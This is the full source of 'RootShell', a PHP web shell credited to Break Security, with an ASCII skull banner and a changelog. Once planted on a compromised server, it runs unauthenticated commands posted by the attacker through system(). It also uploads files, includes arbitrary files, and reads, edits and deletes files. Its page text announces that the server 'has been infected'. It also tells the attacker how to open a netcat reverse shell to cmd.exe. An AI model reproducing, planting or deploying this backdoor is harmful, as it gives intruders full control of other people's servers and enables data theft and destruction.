RootShell.Php by Break Security

1. <!--
2. /* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
3. /* */
4. /* ___________ */
5. /* |.---------.| */
6. /* ||no jueges|| */
7. /* ||al mejor || */
8. /* ||Operderas|| */
9. /* |'---------'| */
10. /* `)__ ____(' */
11. /* [=== -- o ]--. */
12. /* __'---------'__ \ YEI_ZETA */
13. /* [::::::::::: :::] ) BREAK:SECURITY */
14. /* `""'"""""'""""`/T\ */
15. /* \_/ */
16. /* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
17. /*
18. /* Debemos tener cuidado de algún tipo de historia, voy a agregar aquí para mantener un seguimiento de los cambios (Que Lo Hizo).
19. /* ATambién creo que debemos aumentar el número de la última edición de 1 si hace algún cambio.
20. /*
21. /* CHANGES / VERSION HISTORY:
22. /* ====================================================================================
23. /* Version Nick Description
24. /* - - - - - - - - - - - - - - - - - - - - - - - - - - -
25. /* 0.3.1 666 added an ascii bug :)
26. /* 0.3.1 666 password protection
27. /* 0.3.1 666 GET and POST changes
28. /* 0.3.2 666 coded a new uploader
29. /* 0.3.2 666 new password protection
30. /* 0.3.3 666 added a lot of comments :)
31. /* 0.3.3 666 added "Server Info"
32. /* 1.0.0 666 added "File Inclusion"
33. /* 1.0.0 666 removed password protection (nobody needs it...)
34. /* 1.0.0 666 added "Files & Directories"
35. /* 1.3.3 666 added "File Editor"
36. /* 2.0.0 666 added "Notices"
37. /* 2.0.0 666 added some new modules
38. /* 2.0.0 666 made some design updates
39. /*
40. /*
41. -->
42. <?
43. //
44. // Default Changes
45. // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
46.  
47. $owner = "SR-Crew"; // Insert your nick
48. $version = "2.0.0"; // The version
49.  
50. // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
51. //
52. ?>
53.  
54. <body link="#000000" vlink="#000000" alink="#000000" bgcolor="#FFFFD5">
55. <style type="text/css">
56. body{
57. cursor:crosshair
58. }
59. </style>0
60. <div align="center" style="width: 10%; height: 100">
61. <pre width="100%" align="center"><strong>
62. ___________$$$$$$$$$$$$$$$$$$$$$$$
63. ________$$$$___$$$$$$$$$$$$$$$___$$$
64. ______$$$$______$$$$$$$$$$$$______$$$$
65. ____$$$$$________$$$$$$$$$$________$$$$
66. ___$$$$$__________$$$$$$$$___________$$$$
67. __$$$$$____________$$$$$$____________$$$$$
68. _$$$$$$____________$$$$$$$____________$$$$$
69. _$$$$$$___________$$$$$$$$$___________$$$$$$
70. _$$$$$$$_________$$$_$$$_$$$_________$$$$$$$
71. _$$$$$$$$______$$$$___$___$$$$______$$$$$$$$
72. _$$$$$$$$$$$$$$$$$___$$$___$$$$$$$$$$$$$$$$$
73. _$$$_$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_o$$
74. _$$$__$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$__$$$
75. __$$$__$'$$$$$$$$$$$$$$$$$$$$$$$$$$$$$__o$$$
76. __'$$o__$$__$$'$$$$$$$$$$$$$$'$$__$$_____o$$
77. ____$$o$____$$__'$$'$$'$$'__$$______$___o$$
78. _____$$$o$__$____$$___$$___$$_____$$__o$
79. ______'$$$$O$____$$____$$___$$ ____o$$$
80. _________'$$o$$___$$___$$___$$___o$$$
81. ___________'$$$$o$o$o$o$o$o$o$o$$$$'
82. ______________'$$$$$$$$$$$$$$$$$$
83. </pre>
84. </div></strong>
85. <b><u><center><font face='Verdana' style='font-size: 8pt'><?php echo "This server has been infected by $owner"; ?></font></center></u></b>
86. <hr color="#000000" size="2,5">
87.  
88. <div align="center">
89. <center>
90. <p>
91. <?php
92. // Check for safe mode
93. if( ini_get('safe_mode') ) {
94. print '<font face="Verdana" color="#FF0000" style="font-size:10pt"><b>Safe Mode ON</b></font>';
95. } else {
96. print '<font face="Verdana" color="#008000" style="font-size:10pt"><b>Safe Mode OFF</b></font>';
97. }
98.  
99. ?>
100. &nbsp;</p><font face="Webdings" size="6">!</font><br>
101. &nbsp;<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
102. <tr>
103. <td width="1%" height="25" bgcolor="#FCFEBA">
104. <p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
105. </tr>
106. <tr>
107. <td width="49%" height="142">
108. <p align="center">
109. <font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
110. <br />
111. <b>Shell:</b> <? echo $SCRIPT_FILENAME ?>
112. <br>
113. <b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
114. <b>Server Name:</b> <? echo $SERVER_NAME ?><br>
115. <b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?><br>
116. </font></tr>
117. </table><br />
118. <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
119. <tr>
120. <td width="49%" height="25" bgcolor="#FCFEBA" valign="middle">
121. <p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
122. <td width="51%" height="26" bgcolor="#FCFEBA" valign="middle">
123. <p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
124. </tr>
125. <tr>
126. <td width="49%" height="142">
127. <p align="center"><form method="post">
128. <p align="center">
129. <br>
130. <font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
131. <br>
132. <textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
133. <br><input type="submit" value="Execute!"><br>
134. &nbsp;<br></p>
135. </form>
136. <p align="center">
137. <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
138. <br>
139. <font face="Verdana" style="font-size: 8pt"><b>Info:</b> Para una conexión
140.          volver Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
141. </i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><p align="center"><br>
142. <form enctype="multipart/form-data" method="post">
143. <p align="center"><br>
144. <br>
145. <font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
146. <br>
147. <input type="file" name="file" size="20"><br>
148. <br>
149. <font style="font-size: 5pt">&nbsp;</font><br>
150. <input type="submit" value="Subir Archivo!"> <br>
151. &nbsp;</p>
152. </form>
153. <?php
154.  
155. function check_file()
156. {
157. global $file_name, $filename;
158. $backupstring = "copy_of_";
159. $filename = $backupstring."$filename";
160.  
161. if( file_exists($filename))
162. {
163. check_file();
164. }
165. }
166.  
167. if(!empty($file))
168. {
169. $filename = $file_name;
170. if( file_exists($file_name))
171. {
172. check_file();
173. echo "<p align=center>El archivo Ya Existe</p>";
174. }
175.  
176. else
177. {
178. copy($file,"$filename");
179. if( file_exists($filename))
180. {
181. echo "<p align=center>Archivo Ha subido con exito!</p>";
182. }
183. elseif(! file_exists($filename))
184. {
185. echo "<p align=center>el archivo no funciona bien</p>";
186. }
187. }
188. }
189. ?>
190. <font face="Verdana" style="font-size: 8pt">
191. <p align=\"center\"></font>
192. </td>
193.  
194. </tr>
195. <tr>
196. <td style="overflow:auto" width="49%" height="25" bgcolor="#FCFEBA">
197. <p align="center"><font face="Verdana" size="2">[ Files & Directories ]</font></td>
198. <td width="51%" height="19" bgcolor="#FCFEBA">
199. <p align="center"><font face="Verdana" size="2">[ File Inclusion ]</font></td>
200. </tr>
201. <tr>
202. <td style="overflow:auto" width="49%" height="231">
203. <font face="Verdana" style="font-size: 11pt">
204. <p align="center">
205. <br>
206. <div align="center" style="overflow:auto; width:99%; height:175">
207. <?
208. $folder=opendir('./');
209. while ($file = readdir($folder)) {
210. if($file != "." && $file != "..")
211. echo '<a target="blank" href='.$file.'>'.$file.'</a><br>';
212. }
213. closedir($folder);
214. ?>
215. </div><p align="center">&nbsp;</td>
216. <td width="51%" height="232">
217. <p align="center"><font face="Verdana" style="font-size: 8pt"><br>
218. Include
219. something :)<br>
220. <br>
221. &nbsp;</font><form method="POST">
222. <p align="center">
223. <input type="text" name="incl" size="20"><br>
224. <br>
225. <input type="submit" value="Include!" name="inc"></p>
226. </form>
227. <?php @$output = include($_POST['incl']); ?>
228. </td>
229. </tr>
230. <tr>
231. <td width="49%" height="25" bgcolor="#FCFEBA">
232. <p align="center"><font face="Verdana" size="2">[ File Editor ]</font></td>
233. <td width="51%" height="19" bgcolor="#FCFEBA">
234. <p align="center"><font face="Verdana" size="2">[ Notices ]</font></td>
235. </tr>
236. <tr>
237. <td width="49%" height="231">
238. <font face="Verdana" style="font-size: 11pt">
239. <p align="center"><?
240. $scriptname = $_SERVER['SCRIPT_NAME'];
241. $filename = $_POST["filename"];
242.  
243. if($_POST["submit"] == "Open")
244. {
245. if(file_exists($filename))
246. {
247. $filecontents = htmlentities(file_get_contents($filename));
248.  
249. if(!$filecontents)
250. $status = "<font face='Verdana' style='font-size: 8pt'>Error or No contents in file</font>";
251. }
252. else
253. $status = "<font face='Verdana' style='font-size: 8pt'>El archivo no existe!</font>";
254. }
255. else if($_POST["submit"] == "Delete")
256. {
257. if(file_exists($filename))
258. {
259. if(unlink($filename))
260. $status = "<font face='Verdana' style='font-size: 8pt'>File successfully deleted!</font>";
261. else
262. $status = "<font face='Verdana' style='font-size: 8pt'>Could not delete file!</font>";
263. }
264. else
265. $status = "<font face='Verdana' style='font-size: 8pt'>El archivo no existe!</font>";
266. }
267. else if($_POST["submit"] == "Save")
268. {
269. $filecontents = stripslashes(html_entity_decode($_POST["contents"]));
270.  
271. if(file_exists($filename))
272. unlink($filename);
273.  
274. $handle = fopen($filename, "w");
275.  
276. if(!$handle)
277. $status = "<font face='Verdana' style='font-size: 8pt'>Could not open file for write access! </font>";
278. else
279. {
280. if(!fwrite($handle, $filecontents))
281. $status = $status."<font face='Verdana' style='font-size: 8pt'>No se pudo escribir en el archivo! (Tal vez usted no se ha introducido ningún texto?)</font>";
282.  
283. fclose($handle);
284. }
285.  
286. $filecontents = htmlentities($filecontents);
287. }
288. else
289. {
290. $status = "<font face='Verdana' style='font-size: 8pt'>No file loaded!</font>";
291. }
292. ?>
293. <table border="0" align="center">
294.  
295. <tr>
296. <td>
297. <table width="100%" border="0">
298. <tr>
299. <td>
300. <form method="post" action="<?echo $scriptname;?>">
301. <input name="filename" type="text" value="<?echo $filename;?>" size="20">
302. <input type="submit" name="submit" value="Open">
303. <input type="submit" name="submit" value="Delete">
304. </td>
305. </tr>
306. </table>
307. </td>
308. </tr>
309.  
310. <tr>
311. <td>
312. <font face="Verdana" style="font-size: 11pt">
313. <textarea name="contents" cols="53" rows="8"><?echo $filecontents;?></textarea></font><br>
314. <input type="submit" name="submit" value="Save">
315. <input type="reset" value="Reset">
316. </form>
317. </td>
318. </tr>
319.  
320. <tr>
321. <td>
322. <h2><?echo $status;?></h2>
323. </td>
324. </tr>
325. </table> </td>
326. <td width="51%" height="232">
327. <p align="center"><font face="Verdana" style="font-size: 8pt"><br>
328. <textarea rows="13" cols="55"></textarea><br>
329. &nbsp;</font><?php @$output = include($_POST['incl']); ?></td>
330. </tr>
331. </table>
332. </center>
333. </div>
334. <br /></p>
335. <div align="center">
336. <center>
337. <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
338. <tr>
339. <td width="100%" bgcolor="#FCFEBA" height="20">
340. <p align="center"><font face="Verdana" size="2">Rootshell v<?php echo "$version" ?> © 2012 by <a style="text-decoration: none" target="_blank" href="https://www.facebook.com/TheJokerHack">YeiZeta</a> </font></td>
341. </tr>
342. </table>
343. </center>
344. </div>